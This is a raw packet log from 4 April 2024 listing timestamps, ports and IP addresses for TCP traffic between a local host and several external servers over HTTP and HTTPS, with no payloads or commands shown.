Apr 4, 2024 17:49:12.500304937 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:12.500756025 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:12.502183914 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:12.502183914 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:12.502266884 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:12.579633951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:12.581099987 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:12.729381084 CEST	80	49743	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:12.758245945 CEST	80	49745	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:12.758394003 CEST	49745	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:12.942776918 CEST	49745	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:12.942866087 CEST	49745	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:12.959820986 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:13.098208904 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.098263025 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.098293066 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.098323107 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.098351002 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.098370075 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:13.098383904 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.098406076 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:13.098417044 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.098428011 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:13.098437071 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.098474026 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:13.098479033 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.099246025 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.099307060 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.099329948 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:13.099334955 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.099364042 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.099384069 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:13.099389076 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.099432945 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:13.099972963 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.100017071 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.100075006 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:13.100080013 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.100092888 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.100140095 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:13.218282938 CEST	80	49745	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:13.232294083 CEST	80	49745	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:13.232429981 CEST	49745	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:13.285482883 CEST	49745	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:13.288902044 CEST	49746	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:13.293317080 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:13.293338060 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.293351889 CEST	49744	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:13.293359041 CEST	443	49744	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:13.305304050 CEST	49747	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:13.305356026 CEST	443	49747	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:13.305417061 CEST	49747	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:13.305655003 CEST	49747	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:13.305672884 CEST	443	49747	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:13.324460983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:13.560843945 CEST	80	49745	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:13.566828966 CEST	80	49746	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:13.566947937 CEST	49746	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:13.567114115 CEST	49746	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:13.567168951 CEST	49746	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:13.835805893 CEST	443	49747	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:13.835939884 CEST	49747	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:13.844974995 CEST	80	49746	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:13.859100103 CEST	80	49746	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:13.859180927 CEST	49746	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:13.859231949 CEST	49746	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:13.879827023 CEST	49747	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:13.879848003 CEST	443	49747	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:13.880419016 CEST	49748	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:13.881701946 CEST	49747	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:13.881719112 CEST	443	49747	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:14.138763905 CEST	80	49746	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:14.162730932 CEST	80	49748	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:14.162832975 CEST	49748	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:14.163007975 CEST	49748	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:14.163031101 CEST	49748	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:14.445075035 CEST	80	49748	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:14.493093014 CEST	80	49748	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:14.493129969 CEST	80	49748	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:14.493253946 CEST	49748	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:14.493351936 CEST	49748	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:14.497046947 CEST	49749	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:14.775564909 CEST	80	49748	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:14.776005983 CEST	80	49749	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:14.776101112 CEST	49749	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:14.776251078 CEST	49749	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:14.776269913 CEST	49749	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:14.782430887 CEST	443	49747	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:14.782464027 CEST	443	49747	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:14.782510042 CEST	49747	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:14.782540083 CEST	443	49747	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:14.782553911 CEST	49747	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:14.782556057 CEST	443	49747	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:14.782578945 CEST	49747	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:14.782603025 CEST	49747	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:14.797964096 CEST	49747	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:14.797995090 CEST	443	49747	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:15.055151939 CEST	80	49749	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:15.068805933 CEST	80	49749	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:15.068891048 CEST	49749	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:15.069051981 CEST	49749	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:15.159893990 CEST	49750	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:15.159950972 CEST	443	49750	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:15.160031080 CEST	49750	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:15.205904961 CEST	49750	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:15.205924034 CEST	443	49750	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:15.347899914 CEST	80	49749	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:15.366426945 CEST	49751	443	192.168.2.10	192.185.16.114
Apr 4, 2024 17:49:15.366477013 CEST	443	49751	192.185.16.114	192.168.2.10
Apr 4, 2024 17:49:15.366539955 CEST	49751	443	192.168.2.10	192.185.16.114
Apr 4, 2024 17:49:15.367069006 CEST	49751	443	192.168.2.10	192.185.16.114
Apr 4, 2024 17:49:15.367085934 CEST	443	49751	192.185.16.114	192.168.2.10
Apr 4, 2024 17:49:15.652373075 CEST	443	49751	192.185.16.114	192.168.2.10
Apr 4, 2024 17:49:15.652441025 CEST	49751	443	192.168.2.10	192.185.16.114
Apr 4, 2024 17:49:15.654222965 CEST	49751	443	192.168.2.10	192.185.16.114
Apr 4, 2024 17:49:15.654234886 CEST	443	49751	192.185.16.114	192.168.2.10
Apr 4, 2024 17:49:15.654479980 CEST	443	49751	192.185.16.114	192.168.2.10
Apr 4, 2024 17:49:15.672280073 CEST	49751	443	192.168.2.10	192.185.16.114
Apr 4, 2024 17:49:15.716229916 CEST	443	49751	192.185.16.114	192.168.2.10
Apr 4, 2024 17:49:15.743980885 CEST	443	49750	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:15.744251966 CEST	49750	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:15.809262991 CEST	49750	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:15.809282064 CEST	443	49750	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:15.810667992 CEST	49750	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:15.810673952 CEST	443	49750	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:15.922413111 CEST	443	49751	192.185.16.114	192.168.2.10
Apr 4, 2024 17:49:15.922488928 CEST	443	49751	192.185.16.114	192.168.2.10
Apr 4, 2024 17:49:15.922564983 CEST	49751	443	192.168.2.10	192.185.16.114
Apr 4, 2024 17:49:15.922739029 CEST	49751	443	192.168.2.10	192.185.16.114
Apr 4, 2024 17:49:15.922753096 CEST	443	49751	192.185.16.114	192.168.2.10
Apr 4, 2024 17:49:15.922765017 CEST	49751	443	192.168.2.10	192.185.16.114
Apr 4, 2024 17:49:15.922770977 CEST	443	49751	192.185.16.114	192.168.2.10
Apr 4, 2024 17:49:16.005913019 CEST	49752	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:16.102030993 CEST	49753	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:16.102072001 CEST	443	49753	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:16.102535963 CEST	49753	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:16.142591000 CEST	49753	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:16.142622948 CEST	443	49753	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:16.172105074 CEST	49754	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:16.172143936 CEST	443	49754	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:16.172581911 CEST	49754	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:16.172926903 CEST	49754	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:16.172939062 CEST	443	49754	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:16.286372900 CEST	80	49752	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:16.288105011 CEST	49752	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:16.288372993 CEST	49752	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:16.288404942 CEST	49752	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:16.402698994 CEST	443	49753	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:16.402843952 CEST	49753	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:16.406917095 CEST	49753	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:16.406939030 CEST	443	49753	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:16.407200098 CEST	443	49753	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:16.410007000 CEST	49753	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:16.411601067 CEST	49753	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:16.431301117 CEST	443	49754	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:16.431433916 CEST	49754	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:16.432713985 CEST	49754	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:16.432728052 CEST	443	49754	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:16.433042049 CEST	443	49754	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:16.435422897 CEST	49754	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:16.436295033 CEST	49754	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:16.436328888 CEST	443	49754	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:16.456234932 CEST	443	49753	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:16.568649054 CEST	80	49752	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:16.582623005 CEST	80	49752	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:16.582649946 CEST	80	49752	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:16.582765102 CEST	49752	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:16.582923889 CEST	49752	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:16.594847918 CEST	49755	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:16.693500996 CEST	443	49750	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:16.693525076 CEST	443	49750	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:16.693567991 CEST	49750	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:16.693604946 CEST	443	49750	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:16.693622112 CEST	49750	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:16.693636894 CEST	443	49750	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:16.693650007 CEST	49750	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:16.693681002 CEST	49750	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:16.697472095 CEST	49750	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:16.697488070 CEST	443	49750	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:16.863188028 CEST	80	49752	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:16.877506018 CEST	80	49755	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:16.877582073 CEST	49755	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:16.877758026 CEST	49755	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:16.877758026 CEST	49755	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:16.888710976 CEST	49756	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:16.888750076 CEST	443	49756	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:16.888829947 CEST	49756	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:16.889321089 CEST	49756	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:16.889338970 CEST	443	49756	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:17.016383886 CEST	443	49753	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:17.016453981 CEST	49753	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:17.016485929 CEST	443	49753	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:17.016530037 CEST	49753	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:17.016539097 CEST	443	49753	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:17.016556025 CEST	443	49753	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:17.016578913 CEST	49753	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:17.016601086 CEST	49753	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:17.016700983 CEST	49753	443	192.168.2.10	104.21.65.24
Apr 4, 2024 17:49:17.016724110 CEST	443	49753	104.21.65.24	192.168.2.10
Apr 4, 2024 17:49:17.068993092 CEST	443	49754	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:17.069101095 CEST	443	49754	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:17.069190979 CEST	49754	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:17.092114925 CEST	49754	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:17.092154980 CEST	443	49754	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:17.160489082 CEST	80	49755	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:17.175071955 CEST	80	49755	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:17.175087929 CEST	80	49755	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:17.175152063 CEST	49755	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:17.176063061 CEST	49755	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:17.204092979 CEST	49757	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:17.426435947 CEST	443	49756	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:17.426501036 CEST	49756	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:17.432290077 CEST	49756	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:17.432302952 CEST	443	49756	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:17.434437990 CEST	49756	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:17.434446096 CEST	443	49756	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:17.434514046 CEST	49756	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:17.434535980 CEST	443	49756	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:17.458651066 CEST	80	49755	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:17.486506939 CEST	80	49757	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:17.486622095 CEST	49757	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:17.487044096 CEST	49757	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:17.487071991 CEST	49757	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:17.585119963 CEST	49758	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:17.585156918 CEST	443	49758	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:17.585267067 CEST	49758	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:17.585570097 CEST	49758	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:17.585581064 CEST	443	49758	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:17.769231081 CEST	80	49757	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:17.784018040 CEST	80	49757	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:17.784127951 CEST	49757	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:17.784266949 CEST	49757	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:17.791528940 CEST	49759	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:17.843667984 CEST	443	49758	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:17.843848944 CEST	49758	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:17.845390081 CEST	49758	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:17.845402002 CEST	443	49758	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:17.845691919 CEST	443	49758	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:17.849190950 CEST	49758	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:17.849375010 CEST	49758	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:17.849416018 CEST	443	49758	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:17.852112055 CEST	49758	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:17.852119923 CEST	443	49758	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:18.066371918 CEST	80	49757	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:18.073756933 CEST	80	49759	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:18.076230049 CEST	49759	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:18.076502085 CEST	49759	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:18.076524019 CEST	49759	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:18.208432913 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:18.208484888 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:18.208651066 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:18.209081888 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:18.209100962 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:18.358635902 CEST	80	49759	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:18.407674074 CEST	443	49756	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:18.407757044 CEST	443	49756	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:18.407936096 CEST	49756	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:18.409421921 CEST	49756	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:18.409461021 CEST	443	49756	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:18.416944981 CEST	80	49759	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:18.418047905 CEST	49759	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:18.418183088 CEST	49759	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:18.461483955 CEST	443	49758	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:18.461601973 CEST	443	49758	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:18.461720943 CEST	49758	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:18.462150097 CEST	49758	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:18.462162018 CEST	443	49758	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:18.550364971 CEST	49761	443	192.168.2.10	142.250.217.238
Apr 4, 2024 17:49:18.550404072 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:18.550497055 CEST	49761	443	192.168.2.10	142.250.217.238
Apr 4, 2024 17:49:18.550807953 CEST	49761	443	192.168.2.10	142.250.217.238
Apr 4, 2024 17:49:18.550821066 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:18.700061083 CEST	80	49759	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:18.750601053 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:18.750662088 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:18.763879061 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:18.763896942 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:18.765631914 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:18.765641928 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:18.882086039 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:18.882148981 CEST	49761	443	192.168.2.10	142.250.217.238
Apr 4, 2024 17:49:18.882929087 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:18.882982969 CEST	49761	443	192.168.2.10	142.250.217.238
Apr 4, 2024 17:49:18.884618044 CEST	49761	443	192.168.2.10	142.250.217.238
Apr 4, 2024 17:49:18.884637117 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:18.884881973 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:18.885581017 CEST	49761	443	192.168.2.10	142.250.217.238
Apr 4, 2024 17:49:18.932236910 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:19.024770975 CEST	49762	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:19.024811983 CEST	443	49762	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:19.024873972 CEST	49762	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:19.025166988 CEST	49762	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:19.025176048 CEST	443	49762	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:19.283549070 CEST	443	49762	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:19.283704996 CEST	49762	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:19.285427094 CEST	49762	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:19.285439968 CEST	443	49762	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:19.285706997 CEST	443	49762	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:19.286849022 CEST	49762	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:19.286993980 CEST	49762	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:19.287025928 CEST	443	49762	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:19.287087917 CEST	49762	443	192.168.2.10	172.67.217.100
Apr 4, 2024 17:49:19.287096024 CEST	443	49762	172.67.217.100	192.168.2.10
Apr 4, 2024 17:49:19.405658960 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:19.405709982 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:19.405736923 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:19.405814886 CEST	49761	443	192.168.2.10	142.250.217.238
Apr 4, 2024 17:49:19.405829906 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:19.405868053 CEST	49761	443	192.168.2.10	142.250.217.238
Apr 4, 2024 17:49:19.410972118 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:19.411107063 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:19.411129951 CEST	49761	443	192.168.2.10	142.250.217.238
Apr 4, 2024 17:49:19.411154032 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:19.411169052 CEST	49761	443	192.168.2.10	142.250.217.238
Apr 4, 2024 17:49:19.411175966 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:19.411185026 CEST	49761	443	192.168.2.10	142.250.217.238
Apr 4, 2024 17:49:19.411190987 CEST	443	49761	142.250.217.238	192.168.2.10
Apr 4, 2024 17:49:19.413674116 CEST	49763	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:19.601768017 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:19.601804018 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:19.601819992 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:19.602010965 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:19.602011919 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:19.602031946 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:19.603688955 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:19.692373037 CEST	80	49763	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:19.692454100 CEST	49763	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:19.692835093 CEST	49763	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:19.692835093 CEST	49763	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:19.721230030 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:19.721271038 CEST	443	49760	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:19.721364021 CEST	49760	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:19.721364021 CEST	49760	443	192.168.2.10	95.216.179.73
